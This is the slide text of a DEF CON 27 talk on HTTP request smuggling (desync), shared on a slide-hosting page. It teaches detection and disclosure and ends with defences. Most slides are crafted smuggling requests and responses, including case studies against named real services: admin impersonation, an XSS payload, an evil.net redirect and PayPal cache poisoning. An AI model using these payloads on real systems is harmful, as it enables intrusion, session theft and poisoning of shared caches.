Felipe Prado, profile picture
Uploaded byFelipe Prado
PDF, PPTX150 views

DEF CON 27- ALBINOWAX - http desync attacks

This document discusses HTTP desync attacks, also known as request smuggling. It begins with an overview of the topic and various techniques for desynchronizing requests between the frontend and backend servers, such as using conflicting header fields. It then provides case studies of how desync attacks have been used in the past to bypass security rules, extract sensitive responses, and poison caches. The document concludes with recommendations for defenses, such as normalizing requests and using HTTP/2.

Embed presentation

Download as PDF, PPTX
HTTP DESYNC ATTACKS SMASHING INTO THE CELL NEXT DOOR James Kettle
The Fear Theory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 "You will not earn bounties" "You will certainly not be considered like a white hat"
• Theory & Methodology • Exploitation Case Studies • Defence • Q&A Outline
Keepalive
Keepalive, desynchronized
Desynchronizing: the classic approach POST / HTTP/1.1 Host: example.com Content-Length: 6 Content-Length: 5 12345G Unknown method GPOST Frontend sees this Backend sees this POST / HTTP/1.1 Host: example.com …
Desynchronizing: the chunked approach POST / HTTP/1.1 Host: example.com Content-Length: 66 Transfer-Encoding: chunked 0 GPOST / HTTP/1.1 … Frontend sees this Backend sees this Unknown method GPOST
Desynchronizing: the TE.CL approach POST / HTTP/1.1 Host: example.com Content-Length: 3 Transfer-Encoding: chunked 6 PREFIX 0 POST / HTTP/1.1 Host: example.com Frontend sees this Backend sees this
Forcing desync If a message is received with both a Transfer-Encoding header field and a Content- Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3 Transfer-Encoding : chunked Transfer-Encoding: xchunked GET / HTTP/1.1 Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 123 Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked X: X[n]Transfer-Encoding: chunked
Methodology
Detecting desync POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 0 X CL.CL: backend response TE.TE: backend response TE.CL: timeout CL.TE: socket poison POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 3 abc Q CL.CL: backend response TE.TE: frontend response TE.CL: frontend response CL.TE: timeout
Confirming desync POST /search HTTP/1.1 Content-Length: 51 Transfer-Encoding: zchunked 11 =x&q=smuggling&x= 0 GET /404 HTTP/1.1 X: X POST /search HTTP/1.1 Content-Length: 4 Transfer-Encoding: zchunked 96 GET /404 HTTP/1.1 X: X=1&q=smugging&x= Host: example.com Content-Length: 100 x= 0 POST /search HTTP/1.1 Host: example.com Triggers 404 if vulnerable POST /search HTTP/1.1 Host: example.com …
CASE STUDIES
Bypassing rules POST / HTTP/1.1 Host: software-vendor.com Content-Length: 200 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: software-vendor.com X: X GET / HTTP/1.1 Host: software-vendor.com HTTP/1.1 200 OK Please log in
Bypassing rewrites POST / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 Content-Length: 200 Transfer-Encoding : chunked 0 GET / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 X: XGET… $300 xyz.burpcollaborator.net
Request reflection POST / HTTP/1.1 Host: login.newrelic.com Content-Length: 142 Transfer-Encoding: chunked Transfer-Encoding: x 0 POST /login HTTP/1.1 Host: login.newrelic.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 … login[email]=asdf Please ensure that your email and password are correct. <input id="email" value="asdfPOST /login HTTP/1.1 Host: login.newrelic.com X-Forwarded-For: 81.139.39.150 X-Forwarded-Proto: https X-TLS-Bits: 128 X-TLS-Cipher: ECDHE-RSA-AES128-GCM- SHA256 X-TLS-Version: TLSv1.2 x-nr-external-service: external POST /login HTTP/1.1 Host: login.newrelic.com
Exploring HTTP/1.1 301 Moved Permanently Location: https://staging-alerts.newrelic.com/ GET / HTTP/1.1 Host: staging-alerts.newrelic.com GET / HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 404 Not Found Action Controller: Exception caught GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 200 OK Not authorized with header: GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https X-nr-external-service: 1 HTTP/1.1 403 Forbidden Forbidden
Exploring POST /login HTTP/1.1 Host: login.newrelic.com Content-Length: 564 Transfer-Encoding: chunked Transfer-encoding: cow 0 POST /internal_api/934454/session HTTP/1.1 Host: alerts.newrelic.com X-Forwarded-Proto: https Service-Gateway-Account-Id: 934454 Service-Gateway-Is-Newrelic-Admin: true Content-Length: 6 … x=123 { "user": { "account_id": 934454, "is_newrelic_admin": true }, "current_account_id": 934454 … } GET… +$3,000 $3,300
Involuntary request storage POST /1/cards HTTP/1.1 Host: trello.com Transfer-Encoding:[tab]chunked Content-Length: 4 9f PUT /1/members/1234 HTTP/1.1 Host: trello.com Content-Type: application/x-www-form-urlencoded Content-Length: 400 x=x&csrf=1234&username=testzzz&bio=cake 0 GET / HTTP/1.1 Host: trello.com +$1,800 +$2,500 $7,600
Harmful responses POST / HTTP/1.1 Host: saas-app.com Content-Length: 4 Transfer-Encoding : chunked 10 =x&csrf=token&x= 66 POST /index.php HTTP/1.1 Host: saas-app.com Content-Length: 100 SAML=a"><script>alert(1)</script> 0 HTTP/1.1 200 OK … <input name="SAML" value="a"><script>alert(1) </script> 0 POST / HTTP/1.1 Host: saas-app.com Cookie: … "/> POST / HTTP/1.1 Host: saas-app.com Cookie: … +$2,000 $9,600
Accidental Cache Poisoning POST / HTTP/1.1 Host: redacted.com Content-Length: 45 Transfer-Encoding: chunked 0 POST / HTTP/1.1 Host: 52.16.21.24 X: X HTTP/1.1 301 Moved Permanently Location: https://52.16.21.24/ GET /images/x.png HTTP/1.1 Frontend perspective GET /images/x.png HTTP/1.1
Web Cache Deception++ POST / HTTP/1.1 Transfer-Encoding: blah 0 GET /account/settings HTTP/1.1 X: X HTTP/1.1 200 OK Your payment history … GET /static/site.js HTTP/1.1 Sensitive responses with fixed, uncached extensions Sensitive POST responses Frontend perspective Expected habitat: GET /static/site.js HTTP/1.1 Cookie: sessionid=xyz
CDN Chaining POST /cow.jpg HTTP/1.1 Host: redacted.com Content-Type: application/x-www-form-urlencoded Content-Length: 50 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Host: www.redhat.com X: X Red Hat - We make open source technologies for the enterprise GET…
Chaining DOM Problems GET /assets/idx?redir=//redhat.com@evil.net/ HTTP/1.1 Host: www.redhat.com <script> var destination = getQueryParam('redir') [low quality filtering] document.location = destination </script> POST /en/search?dest=../assets/idx?redir=… HTTP/1.1 Host: www.redhat.com HTTP/1.1 301 Found Location: /assets/idx?redir=//redhat.co… Runs on unknown URL in victim's browser Solution: chain a server-side local redirect
'Harmless' responses POST /etc/libs/xyz.js HTTP/1.1 Host: redacted.com Content-Length: 57 Transfer-Encoding: chunked 0 POST /etc HTTP/1.1 Host: burpcollaborator.net X: X HTTP/1.1 301 Moved Permanently Location: https://burpcollaborator.net/etc/ GET /etc/libs/xyz.js HTTP/1.1 … +$550 +$750 +$1,000 +$2,000 +$5,000 +$15,000* $31,900
Web Cache Poisoning POST /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Content-Length: 61 Transfer-Encoding: chunked 0 GET /webstatic HTTP/1.1 Host: skeletonscribe.net X: XGET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Connection: close HTTP/1.1 302 Found Location: http://skeletonscribe.net , c.paypal.com/webstatic/ ? ?
PayPal Poisoning +$18,900 $50,800
Wrapped exploits GET / HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 403 Forbidden Server: AkamaiGHost <HTML><HEAD> <TITLE>Access Denied</TITLE> </HEAD> GET / HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 200 OK … +$20,000 $70,800
DEMO -bugzilla- +$4,500 $75,300
Tooling • Support manual content-length & chunking • Don't proxy testers Safety • Frontend: Normalize ambiguous requests – RFC 7230 • Frontend: Use HTTP/2 to talk to backend • Backend: Drop request & connection DEFENCE
Whitepaper https://portswigger.net/blog/http-desync-attacks Online labs https://portswigger.net/web-security/request-smuggling Desynchronize https://github.com/portswigger/desynchronize References http://cgisecurity.com/lib/HTTP-Request-Smuggling.pdf DEF CON 24 – regilero - Hiding Wookiees in HTTP Further reading
• Detection doesn't have to be dangerous • HTTP parsing is security critical • Complexity is the enemy TAKEAWAYS @albinowax Email: james.kettle@portswigger.net

More Related Content

PDF
HTTP and Your Angry Dog
byRoss Tuck
 
PPTX
Http caching basics
byMartin Breest
 
PDF
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
byNoNameCon
 
PDF
HTTP Caching in Web Application
byMartins Sipenko
 
PDF
Hidden Gems in HTTP
byBen Ramsey
 
PDF
Making the Most of HTTP In Your Apps
byBen Ramsey
 
PDF
Caching the Uncacheable
bydanrot
 
PDF
Cors kung fu
byAditya Balapure
 
HTTP and Your Angry Dog
byRoss Tuck
 
Http caching basics
byMartin Breest
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
byNoNameCon
 
HTTP Caching in Web Application
byMartins Sipenko
 
Hidden Gems in HTTP
byBen Ramsey
 
Making the Most of HTTP In Your Apps
byBen Ramsey
 
Caching the Uncacheable
bydanrot
 
Cors kung fu
byAditya Balapure
 

What's hot

PDF
Caching on the Edge
byFabien Potencier
 
PPTX
HTTP HOST header attacks
byDefconRussia
 
PPTX
Advanced HTTP Caching
byMartin Breest
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PDF
Ruby HTTP clients comparison
byHiroshi Nakamura
 
PPTX
rest3d Web3D 2014
byRemi Arnaud
 
PPTX
Websockets in Node.js - Making them reliable and scalable
byGareth Marland
 
PPTX
Elastic stack
byMinsoo Jun
 
PDF
CFML Sessions For Dummies
byColdFusionConference
 
PPT
Juglouvain http revisited
bymarctritschler
 
ZIP
Websockets at tossug
byclkao
 
PDF
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
byCodemotion
 
PDF
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
byThijs Feryn
 
PDF
Web tech 101
byDan Phiffer
 
KEY
Site Performance - From Pinto to Ferrari
byJoseph Scott
 
PDF
Developing cacheable PHP applications - PHPLimburgBE 2018
byThijs Feryn
 
KEY
Going on an HTTP Diet: Front-End Web Performance
byAdam Norwood
 
PPTX
Altitude San Francisco 2018: Programming the Edge
byFastly
 
PDF
Php through the eyes of a hoster phpbnl11
byCombell NV
 
PDF
Varnish
byFabien Potencier
 
Caching on the Edge
byFabien Potencier
 
HTTP HOST header attacks
byDefconRussia
 
Advanced HTTP Caching
byMartin Breest
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
Ruby HTTP clients comparison
byHiroshi Nakamura
 
rest3d Web3D 2014
byRemi Arnaud
 
Websockets in Node.js - Making them reliable and scalable
byGareth Marland
 
Elastic stack
byMinsoo Jun
 
CFML Sessions For Dummies
byColdFusionConference
 
Juglouvain http revisited
bymarctritschler
 
Websockets at tossug
byclkao
 
Leverage HTTP to deliver cacheable websites - Thijs Feryn - Codemotion Rome 2018
byCodemotion
 
Leverage HTTP to deliver cacheable websites - Codemotion Rome 2018
byThijs Feryn
 
Web tech 101
byDan Phiffer
 
Site Performance - From Pinto to Ferrari
byJoseph Scott
 
Developing cacheable PHP applications - PHPLimburgBE 2018
byThijs Feryn
 
Going on an HTTP Diet: Front-End Web Performance
byAdam Norwood
 
Altitude San Francisco 2018: Programming the Edge
byFastly
 
Php through the eyes of a hoster phpbnl11
byCombell NV
 
Varnish
byFabien Potencier
 

Similar to DEF CON 27- ALBINOWAX - http desync attacks

PPTX
Http request smuggling
byn|u - The Open Security Community
 
PDF
HTTP colon slash slash: the end of the road?
byAlessandro Nadalin
 
PPTX
HTTP
byaltaykarakus
 
PPTX
HTTP Request Smuggling
byAkash Ashokan
 
PPTX
HTTP fundamentals for developers
byMario Cardinal
 
PPTX
Introduction to HTTP protocol
byAviran Mordo
 
PDF
HTTP Request and Response Structure
byBhagyashreeGajera1
 
PDF
Http smuggling 1 200523064027
byn|u - The Open Security Community
 
PDF
HTTPs Strict Transport Security
byGol D Roger
 
PDF
Http requesting smuggling
byApijay Kumar
 
PDF
Http requesting smuggling
byApijay Kumar
 
PDF
H4x0rs gonna hack
byXchym Hiệp
 
PDF
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
byOntico
 
PPT
6 app-tcp
byOlivier Bonaventure
 
PPT
Http request&response by Vignesh 15 MAR 2014
byNavaneethan Naveen
 
PPTX
01. http basics v27
byEoin Keary
 
PPTX
Http - All you need to know
byGökhan Şengün
 
PPT
Http
byEri Alam
 
PDF
HTTP colon slash slash: end of the road? @ CakeFest 2013 in San Francisco
byAlessandro Nadalin
 
PPT
HTTPProtocol HTTPProtocol.pptHTTPProtocol.ppt
byVietAnhNguyen337355
 
Http request smuggling
byn|u - The Open Security Community
 
HTTP colon slash slash: the end of the road?
byAlessandro Nadalin
 
HTTP
byaltaykarakus
 
HTTP Request Smuggling
byAkash Ashokan
 
HTTP fundamentals for developers
byMario Cardinal
 
Introduction to HTTP protocol
byAviran Mordo
 
HTTP Request and Response Structure
byBhagyashreeGajera1
 
Http smuggling 1 200523064027
byn|u - The Open Security Community
 
HTTPs Strict Transport Security
byGol D Roger
 
Http requesting smuggling
byApijay Kumar
 
Http requesting smuggling
byApijay Kumar
 
H4x0rs gonna hack
byXchym Hiệp
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
byOntico
 
6 app-tcp
byOlivier Bonaventure
 
Http request&response by Vignesh 15 MAR 2014
byNavaneethan Naveen
 
01. http basics v27
byEoin Keary
 
Http - All you need to know
byGökhan Şengün
 
Http
byEri Alam
 
HTTP colon slash slash: end of the road? @ CakeFest 2013 in San Francisco
byAlessandro Nadalin
 
HTTPProtocol HTTPProtocol.pptHTTPProtocol.ppt
byVietAnhNguyen337355
 

More from Felipe Prado

PDF
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
byFelipe Prado
 
PDF
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
byFelipe Prado
 
PDF
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
byFelipe Prado
 
PDF
DEF CON 24 - Clarence Chio - machine duping 101
byFelipe Prado
 
PDF
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
byFelipe Prado
 
PDF
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
byFelipe Prado
 
PDF
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
byFelipe Prado
 
PDF
DEF CON 24 - Rich Mogull - pragmatic cloud security
byFelipe Prado
 
PDF
DEF CON 24 - Patrick Wardle - 99 problems little snitch
byFelipe Prado
 
PDF
DEF CON 24 - Antonio Joseph - fuzzing android devices
byFelipe Prado
 
PDF
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
byFelipe Prado
 
PDF
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
byFelipe Prado
 
PDF
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
byFelipe Prado
 
PDF
DEF CON 24 - Gorenc Sands - hacker machine interface
byFelipe Prado
 
PDF
DEF CON 24 - Ladar Levison - compelled decryption
byFelipe Prado
 
PDF
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
byFelipe Prado
 
PDF
DEF CON 24 - Grant Bugher - Bypassing captive portals
byFelipe Prado
 
PDF
DEF CON 24 - Tamas Szakaly - help i got ants
byFelipe Prado
 
PDF
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
byFelipe Prado
 
PDF
DEF CON 24 - Chris Rock - how to overthrow a government
byFelipe Prado
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
byFelipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
byFelipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
byFelipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
byFelipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
byFelipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
byFelipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
byFelipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
byFelipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
byFelipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
byFelipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
byFelipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
byFelipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
byFelipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
byFelipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
byFelipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
byFelipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
byFelipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
byFelipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
byFelipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
byFelipe Prado
 

Recently uploaded

PPTX
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
PDF
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
PDF
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
PDF
MuleSoft Vibes is an AI-powered assistant
byVikalp Bhalia
 
PDF
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
PPT
software-security-intro in information security.ppt
byismaeelsahib032
 
PDF
Hybrid Cloud vs Multi-Cloud Strategy 2025
byTeleglobal International
 
PDF
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
PPTX
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
PDF
Session 1 - Solving Semi-Structured Documents with Document Understanding
byDianaGray10
 
PDF
ElyriaSoftware — Powering the Future with Blockchain Innovation
byElyria Software
 
PDF
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 
PDF
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
PPTX
Ethics in AI - Artificial Intelligence Fundamentals.pptx
byemenyiblessing
 
PDF
API206-S: Transforming Supply Chains with Amazon Bedrock AgentCore - AWS re:I...
byChris Bingham
 
PPTX
The Landscape of Computer Software Development Companies
byYash Singh
 
PDF
Zero Trust & Defense-in-Depth: The Future of Critical Infrastructure Security
byYasir Naveed Riaz
 
PDF
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
PDF
Accelerating Responsible AI Adoption in Public Sector and Private Organizations.
byYasir Naveed Riaz
 
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
TrustArc Webinar - Looking Ahead: The 2026 Privacy Landscape
byTrustArc
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
MuleSoft Vibes is an AI-powered assistant
byVikalp Bhalia
 
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
software-security-intro in information security.ppt
byismaeelsahib032
 
Hybrid Cloud vs Multi-Cloud Strategy 2025
byTeleglobal International
 
Empowering Productivity with Clever Prompts and Intelligent Agents
byUni Systems S.M.S.A.
 
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
Session 1 - Solving Semi-Structured Documents with Document Understanding
byDianaGray10
 
ElyriaSoftware — Powering the Future with Blockchain Innovation
byElyria Software
 
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 
Making Sense of Raster: From Bit Depth to Better Workflows
bySafe Software
 
Ethics in AI - Artificial Intelligence Fundamentals.pptx
byemenyiblessing
 
API206-S: Transforming Supply Chains with Amazon Bedrock AgentCore - AWS re:I...
byChris Bingham
 
The Landscape of Computer Software Development Companies
byYash Singh
 
Zero Trust & Defense-in-Depth: The Future of Critical Infrastructure Security
byYasir Naveed Riaz
 
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
Accelerating Responsible AI Adoption in Public Sector and Private Organizations.
byYasir Naveed Riaz
 

DEF CON 27- ALBINOWAX - http desync attacks

  • 1.
    HTTP DESYNC ATTACKS SMASHINGINTO THE CELL NEXT DOOR James Kettle
  • 2.
    The Fear Theory Q)What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 "You will not earn bounties" "You will certainly not be considered like a white hat"
  • 3.
    • Theory &Methodology • Exploitation Case Studies • Defence • Q&A Outline
  • 4.
  • 5.
  • 6.
    Desynchronizing: the classicapproach POST / HTTP/1.1 Host: example.com Content-Length: 6 Content-Length: 5 12345G Unknown method GPOST Frontend sees this Backend sees this POST / HTTP/1.1 Host: example.com …
  • 7.
    Desynchronizing: the chunkedapproach POST / HTTP/1.1 Host: example.com Content-Length: 66 Transfer-Encoding: chunked 0 GPOST / HTTP/1.1 … Frontend sees this Backend sees this Unknown method GPOST
  • 8.
    Desynchronizing: the TE.CLapproach POST / HTTP/1.1 Host: example.com Content-Length: 3 Transfer-Encoding: chunked 6 PREFIX 0 POST / HTTP/1.1 Host: example.com Frontend sees this Backend sees this
  • 9.
    Forcing desync If amessage is received with both a Transfer-Encoding header field and a Content- Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3 Transfer-Encoding : chunked Transfer-Encoding: xchunked GET / HTTP/1.1 Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 123 Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked X: X[n]Transfer-Encoding: chunked
  • 10.
  • 11.
    Detecting desync POST /aboutHTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 0 X CL.CL: backend response TE.TE: backend response TE.CL: timeout CL.TE: socket poison POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 3 abc Q CL.CL: backend response TE.TE: frontend response TE.CL: frontend response CL.TE: timeout
  • 12.
    Confirming desync POST /searchHTTP/1.1 Content-Length: 51 Transfer-Encoding: zchunked 11 =x&q=smuggling&x= 0 GET /404 HTTP/1.1 X: X POST /search HTTP/1.1 Content-Length: 4 Transfer-Encoding: zchunked 96 GET /404 HTTP/1.1 X: X=1&q=smugging&x= Host: example.com Content-Length: 100 x= 0 POST /search HTTP/1.1 Host: example.com Triggers 404 if vulnerable POST /search HTTP/1.1 Host: example.com …
  • 13.
  • 14.
    Bypassing rules POST /HTTP/1.1 Host: software-vendor.com Content-Length: 200 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: software-vendor.com X: X GET / HTTP/1.1 Host: software-vendor.com HTTP/1.1 200 OK Please log in
  • 15.
    Bypassing rewrites POST /HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 Content-Length: 200 Transfer-Encoding : chunked 0 GET / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 X: XGET… $300 xyz.burpcollaborator.net
  • 16.
    Request reflection POST /HTTP/1.1 Host: login.newrelic.com Content-Length: 142 Transfer-Encoding: chunked Transfer-Encoding: x 0 POST /login HTTP/1.1 Host: login.newrelic.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 … login[email]=asdf Please ensure that your email and password are correct. <input id="email" value="asdfPOST /login HTTP/1.1 Host: login.newrelic.com X-Forwarded-For: 81.139.39.150 X-Forwarded-Proto: https X-TLS-Bits: 128 X-TLS-Cipher: ECDHE-RSA-AES128-GCM- SHA256 X-TLS-Version: TLSv1.2 x-nr-external-service: external POST /login HTTP/1.1 Host: login.newrelic.com
  • 17.
    Exploring HTTP/1.1 301 MovedPermanently Location: https://staging-alerts.newrelic.com/ GET / HTTP/1.1 Host: staging-alerts.newrelic.com GET / HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 404 Not Found Action Controller: Exception caught GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 200 OK Not authorized with header: GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https X-nr-external-service: 1 HTTP/1.1 403 Forbidden Forbidden
  • 18.
    Exploring POST /login HTTP/1.1 Host:login.newrelic.com Content-Length: 564 Transfer-Encoding: chunked Transfer-encoding: cow 0 POST /internal_api/934454/session HTTP/1.1 Host: alerts.newrelic.com X-Forwarded-Proto: https Service-Gateway-Account-Id: 934454 Service-Gateway-Is-Newrelic-Admin: true Content-Length: 6 … x=123 { "user": { "account_id": 934454, "is_newrelic_admin": true }, "current_account_id": 934454 … } GET… +$3,000 $3,300
  • 19.
    Involuntary request storage POST/1/cards HTTP/1.1 Host: trello.com Transfer-Encoding:[tab]chunked Content-Length: 4 9f PUT /1/members/1234 HTTP/1.1 Host: trello.com Content-Type: application/x-www-form-urlencoded Content-Length: 400 x=x&csrf=1234&username=testzzz&bio=cake 0 GET / HTTP/1.1 Host: trello.com +$1,800 +$2,500 $7,600
  • 20.
    Harmful responses POST /HTTP/1.1 Host: saas-app.com Content-Length: 4 Transfer-Encoding : chunked 10 =x&csrf=token&x= 66 POST /index.php HTTP/1.1 Host: saas-app.com Content-Length: 100 SAML=a"><script>alert(1)</script> 0 HTTP/1.1 200 OK … <input name="SAML" value="a"><script>alert(1) </script> 0 POST / HTTP/1.1 Host: saas-app.com Cookie: … "/> POST / HTTP/1.1 Host: saas-app.com Cookie: … +$2,000 $9,600
  • 21.
    Accidental Cache Poisoning POST/ HTTP/1.1 Host: redacted.com Content-Length: 45 Transfer-Encoding: chunked 0 POST / HTTP/1.1 Host: 52.16.21.24 X: X HTTP/1.1 301 Moved Permanently Location: https://52.16.21.24/ GET /images/x.png HTTP/1.1 Frontend perspective GET /images/x.png HTTP/1.1
  • 22.
    Web Cache Deception++ POST/ HTTP/1.1 Transfer-Encoding: blah 0 GET /account/settings HTTP/1.1 X: X HTTP/1.1 200 OK Your payment history … GET /static/site.js HTTP/1.1 Sensitive responses with fixed, uncached extensions Sensitive POST responses Frontend perspective Expected habitat: GET /static/site.js HTTP/1.1 Cookie: sessionid=xyz
  • 23.
    CDN Chaining POST /cow.jpgHTTP/1.1 Host: redacted.com Content-Type: application/x-www-form-urlencoded Content-Length: 50 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Host: www.redhat.com X: X Red Hat - We make open source technologies for the enterprise GET…
  • 24.
    Chaining DOM Problems GET/assets/idx?redir=//redhat.com@evil.net/ HTTP/1.1 Host: www.redhat.com <script> var destination = getQueryParam('redir') [low quality filtering] document.location = destination </script> POST /en/search?dest=../assets/idx?redir=… HTTP/1.1 Host: www.redhat.com HTTP/1.1 301 Found Location: /assets/idx?redir=//redhat.co… Runs on unknown URL in victim's browser Solution: chain a server-side local redirect
  • 25.
    'Harmless' responses POST /etc/libs/xyz.jsHTTP/1.1 Host: redacted.com Content-Length: 57 Transfer-Encoding: chunked 0 POST /etc HTTP/1.1 Host: burpcollaborator.net X: X HTTP/1.1 301 Moved Permanently Location: https://burpcollaborator.net/etc/ GET /etc/libs/xyz.js HTTP/1.1 … +$550 +$750 +$1,000 +$2,000 +$5,000 +$15,000* $31,900
  • 26.
    Web Cache Poisoning POST/webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Content-Length: 61 Transfer-Encoding: chunked 0 GET /webstatic HTTP/1.1 Host: skeletonscribe.net X: XGET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Connection: close HTTP/1.1 302 Found Location: http://skeletonscribe.net , c.paypal.com/webstatic/ ? ?
  • 27.
  • 28.
    Wrapped exploits GET /HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 403 Forbidden Server: AkamaiGHost <HTML><HEAD> <TITLE>Access Denied</TITLE> </HEAD> GET / HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 200 OK … +$20,000 $70,800
  • 29.
  • 30.
    Tooling • Support manualcontent-length & chunking • Don't proxy testers Safety • Frontend: Normalize ambiguous requests – RFC 7230 • Frontend: Use HTTP/2 to talk to backend • Backend: Drop request & connection DEFENCE
  • 31.
  • 32.
    • Detection doesn'thave to be dangerous • HTTP parsing is security critical • Complexity is the enemy TAKEAWAYS @albinowax Email: james.kettle@portswigger.net